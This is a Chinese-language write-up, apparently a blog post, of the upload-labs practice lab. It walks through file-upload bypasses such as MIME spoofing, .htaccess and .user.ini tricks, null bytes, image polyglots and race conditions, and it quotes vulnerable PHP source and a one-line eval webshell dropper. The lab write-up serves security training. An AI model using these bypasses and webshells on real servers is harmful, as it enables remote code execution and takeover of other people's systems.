初见upload-labs(文件上传漏洞)

upload-labs靶场搭建

下载靶场,解压到根目录中

 打开即可

pass1(js)

 传文件

传了,被过滤了,但发现没有抓到包,所以推测是在本地进行的检验 (前端)

包装一下

打开拦截 

submit抓到包了

 改包删去jpg

发包,上传成功

 

获取文件url 

打开蚁剑

 

成功

 pass2(connect-type)

老规矩,传一句话木马,抓包

抓到了,那就发包

 

后端验证,那发个正常照片看看 

抓到了,发包通过 

 获取connect-type

传木马,改包

 上传,没报错

连蚁剑试试

 

pass3 (黑名单)

先试试水

forword

 黑白名单,查看源码为黑名单 限制了如上后缀以及空格,大小写,字符等操作,但没有限制hph3,php5,phpml

传文件改php3

 

 传了,但没有被解析php,被当成文本了

靶场问题,一般使用得看运气,这里改一下配置文件

 加上 AddType application/x-httpd-php .php .php3 .php5 .phpml(先搜有没有#AddType application/x-httpd-php .php)确认没有后

还是不行 

哈哈哈,寄(只有ts版本可以使用该漏洞)实战不用配置靶场应该就行了 

pass4(htaccess)

 和上次一样所以直接看源码,啥都禁就是没禁htaccesss

利用其特性

 让jpg和txt以php文件解析,再传木马

我谢谢你小皮 ,这锅我不背

pass5 (.ini)

看题

$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

 没有过滤.ini

准备一句话木马one.php

改后缀为.jpg

编写.user.ini内容如下

auto_prepared_file=one.jpg

分别上传,后台发现成功

访问readme,打开蚁剑

 连接

pass6 (大小写绕过)

 没有改大小写,无法区分(大小写转换代码如下)

  $file_ext = strtolower($file_ext);#转小写

上传一句话木马

抓包随便改个大小写

但是我在进行解析时缺无法正常解析,弹出500服务器错误

特别注意,我的环境apache 2.4.39的时候连接失败,Response报文状态码500,用nginx 1.15.11是可以成功的 

发包,连接蚁剑

pass7 (空格绕过)

看源码

都有,但少了句去空(内容如下) 

$file_ext = trim($file_ext);

发包即可

注:环境测试需使用低版本5.0,使用7.0版本会提示上传出错 

php全责

pass8(.绕过)

看源码

少这句

$file_name = deldot($file_name);//删除文件名末尾的点

改包

老样子

pass9(额外数据流绕过)

 改包发包

暴400

访问(去后缀)

 成功

连蚁剑

pass10 (. .绕过)

连蚁剑老样子

pass11(双写绕过)

改包

传入成功

连蚁剑 

pass12(空字符)

两种格式

0x00   #编程语言中
 
%00    #url中

当计算机读取到以上代码时结束(从左到右)

eg:123 0x00 456

等效于 123

审计代码,白名单过滤

$ext_arr = array('jpg','png','gif');

再审 

$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);

 获取“.”后的所有字段

$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

拼接 

传一句话木马的jpg格式

改post让拼接作废 

 提示:

在处理数据时,当处理到00,就当作处理完成

PHP版本小于5.3

Magic_quotes_gpc=Off

不然

后面就是接蚁剑等常规操作

还可以

正常上传one.jpg获取url

打开hackerbar

 进入界面

上传即可

 pass13(空字符2)

同12,抓包得

改包

 注意

转16进制

发包连接蚁剑 

pass14-16(图片码)

了解

准备照片和一句话木马融合 

 

 上传成功

打开漏洞文件

访问

连接蚁剑

pass17(二次渲染绕过)

审计代码 

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=UPLOAD_PATH.'/'.basename($filename);

    // 获得上传文件的扩展名
    $fileext= substr(strrchr($filename,"."),1);

    //判断文件后缀与类型,合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".jpg";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "png") && ($filetype=="image/png")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefrompng($target_path);

            if($im == false){
                $msg = "该文件不是png格式的图片!";
                @unlink($target_path);
            }else{
                 //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".png";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagepng($im,$img_path);

                @unlink($target_path);
                $is_upload = true;               
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "gif") && ($filetype=="image/gif")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是gif格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".gif";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagegif($im,$img_path);

                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    }
}

二次渲染会使图片码中插入的代码变为乱码,但并不是全部二次渲染,会存在渲染后相同的片段

将一句话木马插入不变区即可保证二次渲染后木马的保留

传图,并下载图片

比较原图与下载图的内容找到相同区域插入一句话木马后同pass14-16 

pass18(条件竞争)

写一个大马

<?php fputs(fopen('shell.php', 'w'),'<?php@eval($_POST['value']);?>');?>

判断是否有shall.php

若没有写一个内容为小马的shall.php 

审计代码

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

发现文件上传后由服务器判断文件是否合理,不合理便删去

如果在删去前访问便会使其保留

上传抓包

传攻击模块

点击clear,payload选null(持续攻击)

开始攻击

访问并抓包

传攻击器相同操作

同时开始攻击

等待奇迹发生(看运气,现在是凌晨3点老子等不了一点)

电脑太好一直连不上

要是连上了直接蚁剑练shell.php就行

pass19(apache漏洞+条件竞争)

代码审计

//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
    require_once("./myupload.php");
    $imgFileName =time();
    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
    $status_code = $u->upload(UPLOAD_PATH);
    switch ($status_code) {
        case 1:
            $is_upload = true;
            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
            break;
        case 2:
            $msg = '文件已经被上传,但没有重命名。';
            break; 
        case -1:
            $msg = '这个文件不能上传到服务器的临时文件存储目录。';
            break; 
        case -2:
            $msg = '上传失败,上传目录不可写。';
            break; 
        case -3:
            $msg = '上传失败,无法上传该类型文件。';
            break; 
        case -4:
            $msg = '上传失败,上传的文件过大。';
            break; 
        case -5:
            $msg = '上传失败,服务器已经存在相同名称文件。';
            break; 
        case -6:
            $msg = '文件无法上传,文件不能复制到目标目录。';
            break;      
        default:
            $msg = '未知错误!';
            break;
    }
}

//myupload.php
class MyUpload{
......
......
...... 
  var $cls_arr_ext_accepted = array(
      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
      ".html", ".xml", ".tiff", ".jpeg", ".png" );

......
......
......  
  /** upload()
   **
   ** Method to upload the file.
   ** This is the only method to call outside the class.
   ** @para String name of directory we upload to
   ** @returns void
  **/
  function upload( $dir ){
    
    $ret = $this->isUploadedFile();
    
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->setDir( $dir );
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkExtension();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkSize();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }
    
    // if flag to check if the file exists is set to 1
    
    if( $this->cls_file_exists == 1 ){
      
      $ret = $this->checkFileExists();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }

    // if we are here, we are ready to move the file to destination

    $ret = $this->move();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }

    // check if we need to rename the file

    if( $this->cls_rename_file == 1 ){
      $ret = $this->renameFile();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }
    
    // if we are here, everything worked as planned :)

    return $this->resultUpload( "SUCCESS" );
  
  }
......
......
...... 
};

发现传php文件在到服务器前会被删去永远无法同pass18一样访问shell.php

但是由于是apache

我们可以把大马包一层.7z使其可以传到服务器

但是服务器无法识别.7z

他就往前读取,读到.php使文件以php格式打开

于是传

重复pass18操作即可

 

  • 33
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值